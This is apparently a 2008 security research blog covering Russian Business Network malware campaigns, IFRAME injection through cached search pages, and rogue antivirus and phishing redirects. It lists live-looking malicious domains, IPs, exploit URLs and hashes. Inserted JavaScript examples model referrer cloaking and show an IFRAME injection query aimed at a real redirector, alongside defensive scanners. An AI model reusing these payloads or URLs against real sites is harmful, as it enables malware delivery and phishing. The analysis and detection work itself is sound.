Wednesday, March 05, 2008

Rogue RBN Software Pushed Through Blackhat SEO

On numerous occasions in the past I have emphasized the malicious attackers' Keep It Simple Stupid (KISS) approach to everything from Rock Phishing to maintaining a huge portfolio of live exploit domains hosted on a single IP. This is yet another example of the KISS strategy uncovering another huge IFRAME campaign, again taking advantage of locally cached pages generated upon searching for a particular word, and of the IFRAME itself. In the previous example, for instance, we had a second ongoing IFRAME campaign with just 4 pages injected with 89.149.243.201; what Keep It Simple Stupid really means in this case is that the next IP in their netblock, 89.149.243.202, is currently being injected at many other sites as well. The difference between the previous campaign and this one is that the previous one targeted just two high page-ranked sites, while in this one the malicious parties pushing RBN's rogue XP AntiVirus rely on a much more diverse set of domains loading the IFRAME. One factor remains the same: both campaigns continue pushing the rogue XP AntiVirus. Here is XP AntiVirus's pitch; note the download figures cited, and how they forgot to replace every product name in the template they copied (Spyware Doctor is still mentioned):

"XP antivirus has been downloaded over 4 Million times; with a 20,000 more downloads every week. Millions of people worldwide use Spyware Doctor to protect their identity and PC security. XP antivirus has consistently been awarded Editors' Choice, by leading PC magazines and testing laboratories around the world, including United States, United Kingdom, Germany and Australia. All current versions of XP antivirus have won Editors' Choice awards from Secure Home PC Magazine in United States. XP antivirus is advanced technology designed specially for people, not experts. It is automatically configured out of the box to give you optimal protection with limited interaction so all you need to do is install it for immediate and ongoing protection. XP antivirus's advanced RealOnGuard technology only alerts users on a true Spyware detection. This is significant because you should not be interrupted by cryptic questions every time you install software, add a site to your favorites or change your PC settings."

Upon visiting 89.149.243.202/t and 89.149.243.202/a we get forwarded to bestsexworld.info/soft.php?aid=0064&d=3&product=XPA (72.232.224.154) and from there to xpantivirus2008.com (69.50.173.10). There are in fact several other domains currently promoting it as well: xpantiviruspro.com (69.50.183.50); xpdownloadings.com (69.50.183.50); xpantivirus.com (216.255.180.58), as well as the following: hotantivirus.info (74.86.81.80); easyantivirus.info (74.86.81.80); a2zantivirus.com (74.86.81.80). The downloader's detection rate:

Scanner results : 17% Scanner(6/36) found malware!
Time : 2008/03/05 13:57:48 (EET)
File Size : 47104 byte
MD5 : 2102cb53606f535ca8132c3324953596
SHA1 : 0756f530e782c3d2e85a8186e052b722b017f1ea
AntiVir - TR/Crypt.ULPM.Gen
Fortinet - Suspicious
Microsoft - Trojan:Win32/Vxidl.gen!B(Suspicious)
Panda - Suspicious file
Prevx - TROJAN.DOWNLOADER.GEN
Sophos - Mal/HckPk-A

Smells like RBN's former InterCage and ATRIVO netblocks from routers away.

Related RBN coverage:
RBN's Phishing Activities
RBN's Puppets Need Their Master
RBN's Fake Account Suspended Notices
A Diverse Portfolio of Fake Security Software
Go to Sleep, Go to Sleep my Little RBN
Exposing the Russian Business Network
Detecting the Blocking the Russian Business Network
Over 100 Malwares Hosted on a Single RBN IP
RBN's Fake Security Software
The Russian Business Network

Tuesday, March 04, 2008

ZDNet Asia and TorrentReactor IFRAME-ed

This currently ongoing malware-embedding attack aimed at ZDNet Asia and TorrentReactor is very creative at the strategic level, whereas the IFRAME-ing tactic remains the same. The sites' search engines seem to have been exploited to get the IFRAME injected, not embedded, within the last 24 hours, redirecting to known Russian Business Network IPs and ex-customers, in the form of rogue anti-virus and anti-spyware applications. For the time being, zdnetasia.com has 11,200 cached pages loading the IFRAME, and torrentreactor.net 29,300. Even worse, thanks to the sites' high page ranks, the IFRAME-ed cached search result pages hosted on their sites appear among the first ten to twenty results on the major search engines. Sample search queries:

jamie presley
mari misato
risa coda
kasumi tokumoto
jill criscuolo

The IFRAME loads 72.232.39.252/a, which also responds to themaleks.net. The link itself loads an obfuscated JavaScript which, once deobfuscated, attempts to load a-n-d-the.com/wtr/router.php (216.255.185.82 - INTERCAGE-NETWORK-GROUP2), also responding to ppcan.info, with two more domains sharing its nameservers: findhowto.net and searchhowto.net. ppcan.info has already been assessed by Microsoft's security team:

"The advantage gained by faking the Referer field is nullified when pages use client-side cloaking to distinguish between fake and real Referer field data by running a script in the client’s browser to check the document.referrer variable. Example 1 shows a script used by the spam URL naha.org/old/tmp/evans-sara-real-fine-place/index.html. The script checks whether the document.referrer string contains the name of any major search engines. If successful the browser redirects to ppcan.info/mp3re.php and eventually to spam; otherwise, the browser stays at the current doorway page. To defeat the simple client-side cloaking, issuing a query of the form “url:link1” is sufficient. This allows us to fake a click through from a real search engine page."

So the malicious parties implement simple referrer checks to verify that the end users arriving at their IP are the ones they expect to come from the campaign, and not client-side honeypots or even security researchers. If you're not coming from where you're supposed to come from, you get a 404 error message, deceptive to the very end. Sample redirects upon visiting the IFRAME-ed pages at ZDNet Asia with the right referrer:

xpantivirus2008.com (69.50.173.10)
scanner.spyshredderscanner.com (77.91.229.106)
hot-pornotube-2008.com (206.51.229.67)
porn-tubecodec20.com (195.93.218.43)
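The two referrer checks described above, modelled as an added example (this is not code from the original post, from the doorway pages or from the campaign). The first function mirrors the client-side cloaking in the Microsoft quote: look for a search engine's name in the referrer and only then redirect. The second mirrors the server-side behaviour this post describes: anything not arriving from one of the IFRAME-ed sites gets a 404. The third is the check a researcher or client-side honeypot needs: fetch the same URL with and without the expected Referer and compare. The search-engine list, the landing URL and the log-free "responder" are assumptions for illustration; the host names come from the post.

```javascript
// Added example, not code from the original post or from the campaign.
// Names a typical cloaking script looks for in document.referrer (assumed list).
const SEARCH_ENGINES = ['google.', 'yahoo.', 'msn.', 'live.', 'ask.'];

// Client-side cloaking as in the Microsoft quote: the doorway page only
// redirects visitors whose referrer names a search engine; everyone else
// (a crawler, a direct visit, a curious researcher) stays on the doorway page.
// Modelled as a pure function of the referrer string so it runs outside a browser.
function doorwayDecision(referrer, landingUrl) {
  const ref = (referrer || '').toLowerCase();
  const fromSearchEngine = SEARCH_ENGINES.some((name) => ref.includes(name));
  return fromSearchEngine ? { action: 'redirect', to: landingUrl } : { action: 'stay' };
}

// Server-side variant described in the post: the redirector answers 404
// unless the Referer host is one of the IFRAME-ed sites, and otherwise sends
// the visitor on to the next rogue landing page.
function redirectorResponse(headers, allowedReferrerHosts, nextLanding) {
  const referer = headers.referer || headers.Referer || '';
  let host = '';
  try { host = new URL(referer).hostname.toLowerCase(); } catch (e) { host = ''; }
  const allowed = allowedReferrerHosts.some((h) => host === h || host.endsWith('.' + h));
  return allowed ? { status: 302, location: nextLanding } : { status: 404, location: null };
}

// Researcher's check: request the same URL twice, bare and with the Referer
// the campaign expects. Different answers mean the server is cloaking, and
// the replayed answer is what a real victim receives.
function probeCloaking(respond, expectedReferrer) {
  const bare = respond({});
  const replayed = respond({ referer: expectedReferrer });
  return {
    cloaked: bare.status !== replayed.status || bare.location !== replayed.location,
    victimSees: replayed,
  };
}

// Constructed demo inputs; the hosts are the ones named in the post.
const IFRAMED_SITES = ['zdnetasia.com', 'torrentreactor.net'];
const campaignRedirector = (headers) =>
  redirectorResponse(headers, IFRAMED_SITES, 'http://xpantivirus2008.com/');

function cloakingDemo() {
  const landing = 'http://landing.invalid/mp3re.php'; // placeholder landing URL
  return {
    directVisit: doorwayDecision('', landing),
    fromGoogle: doorwayDecision('http://www.google.com/search?q=jamie+presley', landing),
    probe: probeCloaking(campaignRedirector, 'http://www.zdnetasia.com/search?q=jamie+presley'),
  };
}
```

The practical consequence for anyone replaying these URLs from a sandbox: a bare fetch of the redirector looks like a dead link, so the crawler has to carry the referrer of the IFRAME-ed page (and, for the client-side variant, a search-engine referrer) to see the payload a victim sees.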

Once the junkware inventory is exhausted, all pages redirect to requestedlinks.com (216.255.185.82). Let's take a peek at the codec:

Scanner results : 11% Scanner (4/36) found malware!
File Size : 85008 byte
MD5 : 6b325c53987c488c89636670a25d5664
SHA1 : c6aeeafffe10e70973a45e5b6af97304ca20b3bd
Fortinet - Suspicious
Norman - Tibs.gen200
Prevx - TROJAN.DOWNLOADER.GEN
Quick Heal - Suspicious - DNAScan

Even more interesting is the fact that literally minutes before posting this, another such campaign was launched at ZDNet Asia, this time with just 24 pages locally cached and loading another IFRAME to 89.149.243.201/a, redirecting to cialis2men.com/product/61 (92.241.162.154).

What is going on? Have the sites been compromised, or are the attackers in fact smarter than those who would bother scanning for remotely exploitable web application vulnerabilities, next to remote file inclusion? ZDNet Asia and TorrentReactor themselves aren't compromised; their SEO practice of locally caching any submitted search query is being abused. Basically, whenever the malicious attacker feeds the site's search engine with popular queries, the site caches the search results page, so when the malicious party also submits the IFRAME in a "loadable state" next to the keyword, the cached page loads it. Therefore, relying on the high page ranks of both sites, the cached pages carrying the popular keywords become easy to find on the major search engines, and with the "creative" addition of the embedded IFRAME the campaign becomes a reality even on a modest sample of keywords, mostly names.

The bottom line is that ZDNet Asia and TorrentReactor's SEO practice of caching search queries is what is being abused. Given that the malicious parties can now easily make popular keywords appear on ZDNet Asia and TorrentReactor's sites, thereby getting front placement on the search engines, they can pretty much turn the SEO campaign into a malware campaign by taking advantage of "event-based social engineering".
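To make the caching problem concrete, here is an added example (not code from ZDNet Asia, TorrentReactor or the original post) of a search results page that echoes the query into the page and caches the result, beside the escaped version that does not become live markup. The templates, the cache and the poisoned query are constructed for illustration; the IFRAME target is the redirector IP named in this post.

```javascript
// Added example, not code from either site or from the original post.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => (
    { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' }[c]
  ));
}

// Vulnerable: the query is written into the results page verbatim, so an
// IFRAME tag submitted as a "search term" becomes live markup.
function renderResultsVulnerable(query, hits) {
  return `<h1>Results for: ${query}</h1><ul>${hits.map((h) => `<li>${h}</li>`).join('')}</ul>`;
}

// Hardened: identical page, but every user-controlled string is escaped
// before it reaches the HTML.
function renderResultsSafe(query, hits) {
  return `<h1>Results for: ${escapeHtml(query)}</h1><ul>${hits.map((h) => `<li>${escapeHtml(h)}</li>`).join('')}</ul>`;
}

// Stand-in for the sites' practice of caching every query's result page so
// crawlers can index it: the first request renders, every later request
// (including the search engine's crawler) gets the stored copy.
class SearchPageCache {
  constructor(render) { this.render = render; this.pages = new Map(); this.renders = 0; }
  get(query) {
    if (!this.pages.has(query)) {
      this.renders += 1;
      this.pages.set(query, this.render(query, [])); // no hits: the query is junk
    }
    return this.pages.get(query);
  }
}

// Extracts the src of every IFRAME that is real markup (an escaped tag is text).
const IFRAME_SRC = /<iframe\b[^>]*\bsrc\s*=\s*["']?([^"'\s>]+)/gi;
function liveIframeSources(html) {
  return Array.from(html.matchAll(IFRAME_SRC), (m) => m[1]);
}

// The attacker's two steps from the post: submit a popular keyword together
// with the IFRAME payload, then let the cached page be crawled. Constructed query.
const POISONED_QUERY = 'jamie presley <iframe src="http://72.232.39.252/a" width="0" height="0"></iframe>';

function cacheDemo() {
  const vulnerable = new SearchPageCache(renderResultsVulnerable);
  const hardened = new SearchPageCache(renderResultsSafe);
  vulnerable.get(POISONED_QUERY); // the attacker's submission populates the cache
  hardened.get(POISONED_QUERY);
  return {
    // what the crawler, and later a victim following the search result, receives
    vulnerableIframes: liveIframeSources(vulnerable.get(POISONED_QUERY)),
    hardenedIframes: liveIframeSources(hardened.get(POISONED_QUERY)),
    vulnerableRenders: vulnerable.renders, // 1: the injected page is served from cache
  };
}
```

The cache is what turns a reflected injection into a stored one: the attacker only needs to submit the query once, and the high page rank does the rest. Escaping the query fixes the markup; not caching result pages for queries with zero hits would remove the indexing incentive as well.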

Monday, March 03, 2008

Embedding Malicious IFRAMEs Through Stolen FTP Accounts

Keywords for gaining attention from a marketing perspective last week: embedded malware, IFRAMEs, stolen FTP accounts, Fortune 500 companies, Russia. Nothing's wrong with that unless of course you're interested in the whole story and the big picture, which would not exclude the possibility of a Fortune 500 company's servers acting as C&Cs for a large botnet. Why are Fortune 500 servers assumed impossible to hack in the first place, as if the amount of money spent on security were proportional to the level of security reached? Spending more does not mean getting more secure if the money isn't allocated where it needs to be at a particular moment in time, given the dynamic threatscape these days.

What's most important to point out about the recent incident involving Fortune 500 companies' stolen FTP accounts is that it's "stolen accounting data for sale" as usual, as usual in the sense of the hundreds of other such propositions currently active online. And if we're to use an analogy for its importance as an event, it's like your smell receptors: the more you use a particular fragrance, the less you're capable of sensing it, since you're getting used to the smell. In this line of thought, what's "stolen accounting data for sale as usual" for some is an exclusive event for others. Even worse, it's "slicing the threat into pieces" compared to discussing the "pie" itself. Moreover, the shift from products to services in the underground marketplace has been happening for the past three years, so making it sound as if it started yesterday brings the discussion down to the lowest possible level, right back to the very beginning. Take the following malicious services on demand, for instance, demonstrating key business concepts such as consolidation, vertical integration, benchmarking, QA and standardization:

"The concept of Software-as-a-Service (SaaS) is nothing new, but this is the first time anyone has organized the purchase of FTP login credentials, with additional tools available to help a buyer confirm he's making a smart purchase."

On the other side of the universe, on NeoSploit's "purpose in life":

"The information was available for blackmarket trade, along with the NeoSploit version 2 crimeware toolkit, a malicious application specifically designed to abuse and trade stolen FTP account credentials from numerous legitimate companies."

Robert Lemos, however, reasonably points out that:

"The tool, which is at least a year old, was described by antivirus firm Panda Software in June 2007."

Key summary points:
- the tool has been around since February 2007, making it exactly one year old
- it has built-in accounting data validation and page rank measurement of the sites whose FTP accounting data has been stolen, as you can see in the third screenshot attached
- IP geolocation for the now page-ranked sites is also included
- the tool's functions are relatively primitive compared to three other alternatives I'm aware of, which take advantage of anything but stolen FTP accounts, a logical fad by itself
- the script is officially sold for $25, but as we've seen in the past with MPack and IcePack, buyers unaware of other outlets for the tool would pay the high profit margins offered by the seller
- FTP accounting data can be imported, and once verified, statistical output for the automated process of logging in and embedding the IFRAME is provided
- IFRAMEs are automatically embedded within files with .php, .html, .asp and .htm extensions
- embedding IFRAMEs through stolen FTP accounts is a fad; purchasing and selling shells/web backdoors and huge domain portfolios controlled via cPanels is a trend, as is automatic injection of malicious IFRAMEs through remote file inclusion and remotely exploitable SQL injection vulnerabilities

Your situational awareness of the emerging threatscape is, as always, only as good as the information sources you use, or still haven't started using. My point is that exposing Pinch in the summer of 2007, despite the tool having been around since 2004/2005, and exposing this malicious FTP account checker and IFRAME embedder in February 2008, when it hasn't been updated since February 2007, greatly contributes to a twisted situational awareness. Realizing it or not, over time security researchers and intelligence analysts develop a very good intuition about what's happening at a particular moment, or what will be happening any time now. And using stolen FTP accounts for embedding IFRAMEs never picked up as a tactic, compared to using the stolen FTP accounts for hosting blackhat SEO content. Scenario-building intelligence, or playing the devil's advocate, is a mindset only a small crowd possesses.
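The defensive counterpart of the embedder described above is a scan of the web root for frames that should not be there. The following is an added example (not the tool under discussion, and not any site's own code) that walks a set of content files of the extensions the tool targets and reports IFRAMEs that are hidden, point at a bare IP, or point at a host on an indicator list. File contents are constructed; the indicator hosts are the redirector IPs named in the posts above; a real run would read the files from disk or from an FTP listing.

```javascript
// Added example, not the embedder tool discussed above or any site's own code.
const CONTENT_EXTENSIONS = ['.php', '.html', '.asp', '.htm']; // the extensions the tool embeds into
// Indicator list: redirector IPs from the posts above (extend from your own intel).
const KNOWN_BAD_HOSTS = new Set(['89.149.243.201', '89.149.243.202', '72.232.39.252']);

const IFRAME_TAG = /<iframe\b[^>]*>/gi;
const ATTR = (name) => new RegExp(`\\b${name}\\s*=\\s*["']?([^"'\\s>]+)`, 'i');

function hasContentExtension(path) {
  const lower = path.toLowerCase();
  return CONTENT_EXTENSIONS.some((ext) => lower.endsWith(ext));
}

// Heuristics separating an injected frame from a legitimate embed: zero size
// or hidden style, an IP literal as host, or a host on the indicator list.
function assessIframe(tag) {
  const reasons = [];
  const src = (tag.match(ATTR('src')) || [])[1] || '';
  let host = '';
  try { host = new URL(src).hostname; } catch (e) { host = ''; }
  const width = (tag.match(ATTR('width')) || [])[1];
  const height = (tag.match(ATTR('height')) || [])[1];
  if (width === '0' || height === '0' || /display\s*:\s*none|visibility\s*:\s*hidden/i.test(tag)) reasons.push('hidden');
  if (/^\d{1,3}(\.\d{1,3}){3}$/.test(host)) reasons.push('ip-literal-host');
  if (KNOWN_BAD_HOSTS.has(host)) reasons.push('known-bad-host');
  return { src, host, reasons };
}

// files: Map of path -> content. Only content extensions are examined, which
// is exactly where an embedder writes; anything else is left alone.
function scanFiles(files) {
  const findings = [];
  for (const [path, content] of files) {
    if (!hasContentExtension(path)) continue;
    for (const tag of content.match(IFRAME_TAG) || []) {
      const a = assessIframe(tag);
      if (a.reasons.length) findings.push({ path, ...a });
    }
  }
  return findings;
}

// Constructed sample web root: one injected frame to a listed IP, one hidden
// frame to an unlisted IP, one legitimate visible embed, one non-content file.
const SAMPLE_FILES = new Map([
  ['index.html', '<html><body><p>welcome</p><iframe src="http://89.149.243.202/a" width="0" height="0"></iframe></body></html>'],
  ['about.php', '<?php include("header.php"); ?><iframe style="display:none" src="http://203.0.113.7/t/"></iframe>'],
  ['contact.asp', '<iframe src="https://maps.example.com/embed" width="400" height="300"></iframe>'],
  ['notes.txt', '<iframe src="http://89.149.243.201/a" width="0" height="0"></iframe>'],
]);

function scanDemo() { return scanFiles(SAMPLE_FILES); }
```

Run it against a fresh FTP mirror of the site and diff against the previous run; a new hidden frame in a file whose modification time coincides with an FTP login from an unfamiliar address is the signature of exactly the tool described above. The heuristics deliberately do not depend on the indicator list alone, since the IPs rotate within the netblock, as the first post on this page shows.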

Wednesday, February 27, 2008

RBN's Phishing Activities

As we're on the topic of RBN's zombies trying to connect to their old netblocks, and of botnets being used to host and send out phishing content: what looks like entirely isolated incidents in the present is what has actually been going on on RBN's network since the summer of 2007. A picture is worth a thousand speculations. As you can see in the attached historical screenshot of a web-based botnet C&C, the Russian Business Network's old infrastructure was also involved in delivering phishing pages to malware-infected hosts, whose requests to the legitimate sites were forwarded to RBN's old netblock. The process is too simple, and its modularity lowers the entry barriers into phishing: the botnet master can configure, in no more than three clicks, which fake phishing site the infected population is redirected to when they visit the original one. And so, for the purpose of historical preservation of CYBERINT data, and given the quality of the identical screenshot obtained through OSINT techniques:

RBN URLs used in the phishing redirects :
81.95.149.226/scm/us/wels/index.html
81.95.149.226/scm/uk/lloydstsb/personal/index.html
81.95.149.226/scm/cyprus/persmain.html
81.95.149.226/scm/au/westpac/index.html
81.95.149.226/scm/au/commonwealth/
81.95.149.226/scm/au/warwickcreditunion/index.html
81.95.149.226/scm/uk/lloydstsb/business/index.html
81.95.149.226/scm/uk/halifax.php
81.95.149.226/scm/uk/rbsdigital/index.html
81.95.149.226/scm/uk/co-operative/index.html
81.95.149.226/scm/uk/cahoot.php

Known malware to have been connecting to 81.95.149.226 :
Trojan-PSW.Win32.LdPinch.bno, Trojan-Downloader.Win32.Small.emg and Trojan.Nuklus: these are different vendors' names for the same malware, which is the only sample ever observed making a request to 81.95.149.226. In combination with the fact that the screenshot comes from a Nuklus C&C, that speaks for itself.

Some facts are better known late than never.
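The redirect scheme above has one observable that does not depend on how the infected host was made to forward the request (the post does not say whether it was a hosts-file entry, a proxy setting or something else): an HTTP request whose Host is a bank's domain travelling to an address that is not the bank's. The following is an added example (not from the original post) of that check run over constructed proxy log lines in an assumed format; the suspect IP is the RBN address listed above, and the bank domains are assumptions matching the phishing paths in the list.

```javascript
// Added example, not code from the original post. Mechanism-agnostic
// detection of the bank-to-RBN redirect from a proxy or egress log.
const SUSPECT_IPS = new Set(['81.95.149.226']); // RBN address from the post
// Assumed legitimate domains for the brands in the post's phishing paths.
const BANK_DOMAINS = ['lloydstsb.co.uk', 'halifax.co.uk', 'westpac.com.au', 'commbank.com.au'];

// Assumed (constructed) log format: "<client> <dest-ip> <method> <url>".
// Real proxies differ; adapt parseLine to the fields you actually have.
const LINE = /^(\S+)\s+(\S+)\s+(\S+)\s+(\S+)$/;

function parseLine(line) {
  const m = line.match(LINE);
  if (!m) return null;
  let host = '';
  try { host = new URL(m[4]).hostname.toLowerCase(); } catch (e) { return null; }
  return { client: m[1], destIp: m[2], method: m[3], host, url: m[4] };
}

function isBankHost(host) {
  return BANK_DOMAINS.some((d) => host === d || host.endsWith('.' + d));
}

// A bank hostname going to the suspect IP is the redirect in action; any
// other hostname going there is the bot talking to its C&C or updating.
function classifyLine(line) {
  const r = parseLine(line);
  if (!r || !SUSPECT_IPS.has(r.destIp)) return null;
  return { ...r, kind: isBankHost(r.host) ? 'phishing-redirect' : 'c2-contact' };
}

function suspectEvents(lines) {
  return lines.map(classifyLine).filter(Boolean);
}

// Every client that produced a suspect event is an infected host to image.
function infectedClients(lines) {
  return [...new Set(suspectEvents(lines).map((e) => e.client))].sort();
}

// Constructed sample log. 198.51.100.20 stands in for the bank's real address.
const SAMPLE_LOG = [
  '10.0.0.12 198.51.100.20 GET http://www.lloydstsb.co.uk/personal/',
  '10.0.0.12 81.95.149.226 GET http://www.lloydstsb.co.uk/personal/',
  '10.0.0.34 81.95.149.226 GET http://www.halifax.co.uk/',
  '10.0.0.34 81.95.149.226 GET http://update.example.net/check',
  'garbage line',
];

function logDemo() { return suspectEvents(SAMPLE_LOG); }
```

The same comparison can be made at the DNS or proxy layer without an indicator list at all: resolve the bank's hostname from a clean resolver and alert whenever a client's connection for that hostname goes elsewhere. The indicator version shown here is what you run retrospectively over archived logs, which is how the historical connections to 81.95.149.226 listed above would be found.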

Yet Another Massive Embedded Malware Attack

The following central redirection point in a portfolio of exploit and malware serving domains, buytraffic.cn/in.cgi?11, is currently embedded at a couple of hundred sites and forums across the web. And just like the many previous such examples, the process is automated to the very last stage. Repeated requests expose the entire domain portfolio: once the live exploit is served with the help of JavaScript obfuscation, the binaries come into play. Here are all the domains and live exploit URLs involved in this particular campaign:

buytraffic.cn/in.cgi?11 - 62.149.18.34
sclgntfy.com/ent2763.htm - 85.255.118.12
tds-service.net/in.cgi?20 - 72.233.50.148
spywareisolator.com/landing/?wmid=sga - 72.233.50.150
warinmyarms.com/check/upd.php?t=670 - 58.65.239.114
coripastares.com/in.php?adv=1267&val=3ee328 - 202.83.197.239
xanjan.cn/in.cgi?mikh - 78.109.22.246
chportal.cn/top/count.php?o=4 - 203.117.111.102
buhaterafe.com/in.php?adv=1208&val=65286d - 202.83.197.239
193.109.163.179/exp/count.php
193.109.163.179/exp/getexe.php
78.109.22.242/mikh/1.html
78.109.22.242/sh.html

Who says there's no such thing as free malware cocktails.

Related posts :
MDAC ActiveX Code Execution Exploit Still in the Wild
Malware Serving Exploits Embedded Sites as Usual
Massive RealPlayer Exploit Embedded Attack
Syrian Embassy in London Serving Malware
Bank of India Serving Malware
U.S Consulate St. Petersburg Serving Malware
The Dutch Embassy in Moscow Serving Malware
U.K's FETA Serving Malware
Anti-Malware Vendor's Site Serving Malware
The New Media Malware Gang - Part Three
The New Media Malware Gang - Part Two
The New Media Malware Gang
A Portfolio of Malware Embedded Magazines
Another Massive Embedded Malware Attack
I See Alive IFRAMEs Everywhere
I See Alive IFRAMEs Everywhere - Part Two

Tuesday, February 26, 2008

RBN's Malware Puppets Need Their Master

Despite the fact that it's already been a couple of months since RBN's main ASN got "withdrawn" from the Internet due to the public pressure over the Russian Business Network's malicious activities, hundreds of malware variants continue trying to reach their C&Cs and update locations on RBN's old netblock. Malware puppets with no master to connect to despite their endless efforts: now these are the real zombies, if we're to stick to the terminology. Catch up with more details on RBN's migration and extended partnership network.